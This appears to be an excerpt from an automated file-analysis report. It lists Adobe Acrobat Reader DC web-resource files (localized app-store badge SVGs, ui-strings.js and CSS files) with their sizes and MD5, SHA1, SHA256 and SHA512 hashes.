                                                                                                                                                                                                                                                  4ae90888177ce894dbda13baf27740cfe6656429af27a95235323b238ab81adff4575c59831072fb6544f704d51eb7e39cdbdfbe0a31ef0bafcc6cc59bfd1919

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_ja_135x40.svg

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  17KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  fbefcdbbfd3b39278d6b55a764984122

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  07f083794322d14eae6fab353bc83d3ac14a9b3b

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  92dcb5cf1544b64e9ad1daf1ddeca87842e65aefe1f99c3463bb6f070541b18d

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  9d502f37995011fbca1374260b53687c36f231dbf802dc6fe6abac5a109651987f8c3d65b163f5cda9ddb78e66934f4ef3ffe677637c8eeb612da7820417ea0c

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_ko_135x40.svg

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  17KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  8ddb6e087dcdf2814f6a4d8971e065f2

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  b807db88a294e43efc6106f040c061ef02669c33

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  40a0b14ff5404914f195139c8dd2887a94a697e06d4ff1d90efb88162e3ebe89

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  e12c7035155b0d63ee789dc4372ebfb030be5dac1b7679cde73f63a9b5ee43c25ce3cfe228312a4aad86ae614553424d7da2a3797611fd9ec2ddb8d8a201a459

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_nb_135x40.svg

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  20KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  a215e4aa9f7c40fd19f6374ee396adfd

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  6834f1f6c552fcad05a622f71cc75e2196c51200

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  d26c9806902a2fbfb5f968867f28d0ed961c0220208ee6bd5f15ee97488f7e75

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  d81cfa918d0268d0780311d093afe24dfb9c14a5f49907c2db424a99052d8c8a43b18c1f6ea2fd07aaa26a80f57b0ccaba93ee555254eddc95cf1d5e9f9640b9

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_pl_135x40.svg

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  18KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  bada1dbf4eb4c45dfaac5a2d0368a7ec

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  bd7f96bc0cb6549327b0162e541559203b8e4f28

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  752ebe8775d553371f340fdcc02dc954f3724431b432d7ca5ac5033019be6eec

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  f673e87fb30d2bf23ed2e31b943b2052a1b7ad2d80cac382c7501b779dd625f6d10786e212769429a19307d64374a2381b2fb1061fcda234f6f0b69829c03878

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_pt_135x40.svg

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  19KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  b2245fcdb30d96902f6ff4ebd86c00da

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  cb4c84e22062845f59c7e51f279b8b6b4190a433

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  469bc1b3179eb353201ce6a7b9a8b85c26d2506c46aa1afccbc833113687543d

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  12acddddaf75ab60e0de4272f54a7e2f31e4b08ddfef4bcb2a2e73afd7a914f25dac98611757971695da610e8dcba7f364227fd12497ca4d26bff21463dc938c

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_ru_135x40.svg

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  23KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  c49d0ce5f4852476dc8601925b4a08c4

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  d0efec719b8c5f50d840b0889af92cd26f016e8f

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  233b4bc0997f06692de127945ff471e1901cb8b470662e2ce6d43adaa9aad00b

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  904d07f6045d5e8f95b172c1cae747fc2e8ff167092a3301598d6cfb2bb058d5c63f4765143769a5b02ece0180f68ffda71ec62d89619e6151ed102112a38e9b

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_sv_135x40.svg

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  17KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  cd925f197f94f072898d42c88816b0d0

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  c2a7f6b1818a8a2251be0700accbe17f9c68d84f

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  69109ad49f4019df98cda60b25bb018d02a39040d3e9dff580ca5acd9c3f60d8

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  35b8ff0b5f87f9e78e28be24967d99504d79419422c23846aeaed8cdf01e0da8a34412f9236bec48ad3500428d0c81857c27fca303e62b32d33109b9c7813e7e

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_tr_135x40.svg

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  21KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  9dc836687d48d97e1280b107e4194350

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  b32a318326496d85bb780b24aaeb79b7f0c444a3

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  6b1be30e426c20c3b19d2c545631a90b1021d7f03dc9d1883265413fdd337390

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  ea37394dd8524a2d06520a0c1c101ea93edf4e066ed85a0f96dadf87453ee3e5bc132aab2be74aeace7ed7a9a869eba74968eb8d09307b95d03f5b8405bce21f

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_zh_cn_135x40.svg

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  14KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  673615b649d433e10e8de036cffc5511

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  f34b89b8c70440a43e57759c36e5b912e570ba0b

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  4b5d52b96dd4da79e066d4edf25f72404cbcc3a58f43c3640325ae7860fb2482

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  c904d6c061e48bd20a1714ca63ff5d786d32007ce672c1648d116c24699f01d5b5ad8ad4a433d66729f58d2f3b47c954ca696b82824ec181d27abd526b77640d

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_zh_tw_135x40.svg

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  15KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  a1a7619e7dd244f8bf4a4107d20d6f23

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  64dccda92a077243416b6a63f3fb5893a122d8cb

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  109da9bfe22931e7146c0209e338109247e1fc8c7426c814c4ac83520ad30686

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  f5361fe58b6c35bbb7eef2e3af57976b6f1257d6c8df972d0bf183d3d4ab631807833ae3a4525e54f0cd7ef04ea7318609f150f8a8c669e900c37f538b21bebf

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\cs_get.svg

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  5KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  8c7f0ff22c61f71325c6bc0359170fd0

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  4689b292837a2b56ada42bde214314bb99c3f2cf

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  80d5b1c347a06cb098f343a9eaf30eac351320a05c5b7f7322c98bf31bff0ba3

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  8d72d6a2ad45ddba9b16f7bbdbdc26834dcb5d4c9a139a97afea7f649dfd7c8c7cf83466db5adaf555572bfa389ed9e76c28783a0480d528bac4b35ee5af2ca3

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\da_get.svg

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  5KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  f3eac560f8faee2e93eef02b4576a7cb

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  8b0f7ce83c48864993e465451f23c734e70e1f9c

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  8371c9ce384395ed529fa5fa6296cdd7ac503d135bbc3a72b99efcf4825ae683

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  3147457cef8e7b1840062b9756ba5e53a416123b5814ffa3397c9238c7e4ea37b005cade16967ce50ef0704559cef34e36e05571eaf68ed9d592967e6ffecd67

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\de_get.svg

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  6KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  ca79cb7723071f9d3ef95eb347a030f2

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  5374021d9a7294093c4dcb21e46004293637a6ee

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  1e4cc7cfb5f075f2fdf35028f6fd2ea47fbf4b180e6d9d7e1cbf2b8e517cd0a6

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  4ffb193925fb9226bd3c64c8a2215b83834cfbadf28c3b60226ac03a987b2182126a6eff13d45333a3a066f0cb0cf24758d557391dbd9f549a17d9618bd58cd3

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\es-419_get.svg

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  7KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  041932a206fa42472334ec19c73accb0

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  b468b0b8ed09b95f5b284445742b3ca89313981c

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  2d3e66a0cf4baa5cdf33de45000031b96137b22e6166872485458cf82f1795ce

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  ab134248baf02ee39b4bdae371ec29e5af9b6cf96930946cd0ed0e09642b25fb70f94bc6a1600bc9504092c90c935f1fa59376f6514f9829f41335a2b30a1b63

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\fi_get.svg

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  5KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  f21b0d1da4f7d0733f9bae4f9dd52444

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  0254dfccbab2cf97d6578307af8eefe62408a7dd

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  0bd5ff1c2b13f423a4138f9abf0e595b512ba7d1044527e1c7ce396e20ee7416

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  37d0f5d6b3a5e58a2af60f3a6a8f5ed078aa83442e830a805ab106f44d105751499e31e1f49320b82fd023658f02a7a91cf45542b7c0e0d2fe71b4176be64f03

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\fr_get.svg

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  8KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  7c5efc9da59fa2a2261e24b08eb6b7d0

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  398a6e69602b7b6bee8ef5a631e06e2135ef7cc6

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  7392c5b8facbc65715a1bc2154e51bd5ced761ebeabd85ec7060104a148b4bf5

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  0db2ffa56c4d33a7d50cb4a2c6dedab2cecb83ddce9214730d02e393955a951f18ee0d4b412b4cfe022e1bef0a1084b3f1d8d691b7684e0af9eb72c92831d836

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\it_get.svg

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  7KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  95186186fd476e84b825c91c54b1906c

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  abac845bd97a05a7a614d0907f57f1b3799365dd

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  babb44681a95fe59f85e21a5573cd020154485cfa3f3418e3da31b8f956289c4

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  9f735d5227dc5141d5b2322aa9d7d46d07b535fb0a6bc078a96d4e790625b5be58159dbf98823536fb52b4aa0a3c05d9f97b8680855e9aeca04080417c872486

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\ko_get.svg

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  6KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  d5d4ef6b7035b3e54d7efe96d05c87ee

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  05f4d3426d3a0b81acca05ba07682a335b5c66e8

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  4e684dbcdee296aee88ca3854415c0b826e050170a9c3dff7f15a44e8a59e013

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  27b2042be9bf71eab17a7ff9717c968b813011fb4467ab28581ce27318709c16309bf0e9ba3f1a79e433d7426fe818faba944081c3712ff6a11e5e6dbc6b1003

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\no_get.svg

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  7KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  4d0350fda9fd85c2ae729d6c0da8a254

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  1b29a6daf0f548530b3c93aadcd45502712b6a41

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  75797dd6ef6e80896e123d4fb20abfafef0393179fbd7b1345724e96503776ca

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  8f7414d170911d3f1bf2861a1ef99b61e010804ab87117d836a9f2d8454a3ed2d112630736033d54bd387950ad709db43082d040cba7d0bf7fa84a03a9704740

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\pl_get.svg

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  6KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  2ba2ac54072a894bdb327cdaea559a1b

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  4e47523656ddc0798567d308c447e2bd37289981

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  fae93a98a295c9e7b3583ff40792b5f37fd23e027efbacb5dd16fbdada9488f7

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  bfd5059c7ee715f212fd805239ec7092c3f0423623f58916e9316e4090b235b76984d97ce37fd83954b4ead05cdaf2a74a636345ef6cf4d27ecbd02708a7f0aa

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\pt-br_get.svg

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  7KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  8283eb581e385f6b40e7ddfa4c1a5fce

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  bee9cb459a84d28f7942df62885cd1fee361ca48

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  6281997d275c27706e43753d9d2d85ed71a9a90c987e4bbf1fa8fcedcdea57d4

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  db32dbc02571bd503a95304d814aca6f8d21e4a256f1250ce77b48da44889f3038211ec3eb9b68cc69a0ddab02cbf9f78c3e9486d9a29b143d716f425818b4f8

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\ru_get.svg

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  6KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  739ec3f9adcd1d148c58bc0d67a0a94e

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  96e36392e60f9fb5aec5c12bc5868aaeb30dd876

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  8784bbb27c07d7764b035dd15f397888688bfaab847f8603d1477b772ed73b1b

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  f397dbabd008bde21cf2cd151f2257d20ee073824b9469eff4b9bf0b936d94ae509cd89872240c53ae4da54f1ad02536ac8b651d1969f6dcfa80902460e25894

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\sv_get.svg

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  6KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  e973a138a4284e48b8a7709f1e832515

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  c9852a5db6d5856484342ec38be6e38df2a35ba1

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  8fcee1af158d03f43e9c3831452617d58e7ebb0f77c3c200f8de1360920d8b7c

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  8025915a23450bbab52b6b90d8d2943c5cf5ded271e0700774b509736ccdaaf5a86de443d3066dd62d3f0e524c1f7f5cf2669040d3328774d0aefadcd81cebdf

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\tr_get.svg

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  5KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  c82472985109af1504093f25d8f7a7c0

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  09a215f94db19b48bc8bf3669352b52f8571f368

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  c5d33b892e3ab4bd4fce82c31ef7bf77698590a44b181220119b81015978afea

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  10562de93ee94f4c5dc49267ee5b63deddeff0a2e149fd723f3bd4ebf25c8802709f6b73e6b0aeac0a1332ae49d84e28d6e7982d2d97d4ef925b32a79e4d5010

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\zh-cn_get.svg

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  7KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  8bd4c709cc58734604fbe05b09329006

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  071a277a95c06d845f944f1412b1d1d73721dc41

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  748ec139c1de347939c9866275ceb3fe02d04b8ac1dcac76891c85d8dc0d38cd

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  30c591f407331398290cf9d182ff8df4dccff4b756ebdce4f96e0d03c8c1d4319211ee7e92e4b721d27c6d45822dab59c41d8fe386154e6459bfd9c0d6f2817e

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\zh-tw_get.svg

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  6KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  d975b4cad2b85ea3149ed64e2dc51c05

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  078c26590d04d706ccba5376840eaa2c6e068dab

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  3dbe479996fa5cca35406ed637dd395aa07239871335952ed6d3a24366d5910b

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  865ee1dfe7e025557fed1d04cf3fca25f83ae40e3fb3898d2eee45c6e0c8f37833084b8c38cb3b6eb3414b709b58f5c298cb92c40a48de3c6374cd1f7004dae6

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\root\ui-strings.js

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  e0264db668cfd0b257ac3cef525b7b44

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  7e4b13ef9624a4e98c759ce4c497f43617dad783

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  94c83e73cc5188908c430d13627d4f3eede5943558ce2088ec8599fe1a5013a8

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  ebb18c6b7331e098cfb4001a3353a0693860a90cbf93df94cd66a96328fdb8aeafa6ed66059a6d396058e70dad1085ad5410cbc73924987abb6d4f25d9435453

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ui-strings.js

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  b557db3218783eb7eb611bcd096c3480

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  b48a0d4305424d894d078a7de560ed2a2de010c4

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  1cdd784443f346d17c953f4e0c0276f2de2f8c39b691389114e7e44000210ae5

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  d35cebad87061ed98500db3ccf8048130d9e38673dcef8753f040c6efb17e0ea3891c439f34d9b56c5652683d86ebfab8c3d599b57a20e9cb32ef124a5c2a52f

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\css\main.css

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  eb21c8a9f9492c50119f7e66696be7b1

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  d8ae4e6ca8658e14cb015b43d0bab35321fa8614

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  f0f753baa7b48871591f963a0d07fcffa3065c680db74e841ac9b864d43d1e64

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  65dc79267b8691272f1ebb1d4798b27084c7a304e41af761867d9dbd3b7c3fb5acb3242c1b3355d841c6458d14ca31ce24cb84999b35c51c1e7950886d6e28b7

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\he-il\ui-strings.js

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  a24c68608ee171f058ecf13200f540d5

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  3271794333ea59bc159825394f9727fe57c83699

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  c1bbab77627f98eed2fe2edb898daf5b0bbdcf82ffcb9dfa449e0ad1c77a432c

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  4af04c59d1606a6d7723370ec233dde771b2338dcb065da0ced6754adf3a8e3d1cf7dccd3199149e84655bae000fcf284906d75837c699f99a562f9e010ea00d

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\nb-no\ui-strings.js

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  552da5b432bab995795e1f9403d524a3

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  1b75eac089ec8f2da6d2f8867f18471344af4015

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  f4c8dd7d243b1ec0cc6590f09a038e3bda936fa8053091b1992dbd9875d05d42

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  fb62d096617b9c0bf3c4fc05501bc3221dbfd804d90aa257e1b1e1b70650faafd955396175063461b9cbdd902bac26e7cea1236a35372d7dedb7658f5de246bf

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\root\ui-strings.js

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  480a26eedb5f2962167e560c0571f9ed

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  f636646b296c6b67b074fa9c0f11ede98529f039

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  97981408ddea4081f5e4a1a5c29d687cef2c3380fa746d02308fd1fdd71e4e6b

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  3840eca1dedb87cc09e0952dd5260a58ae4f4508e6162d925b6125cd5d3031fda4b64da52aee9087677975aa474591a133fe155b4c567288b382d02dfbb13c42

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\css\main-selector.css

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  a24c6ef32b9623d31b32d64759aff37e

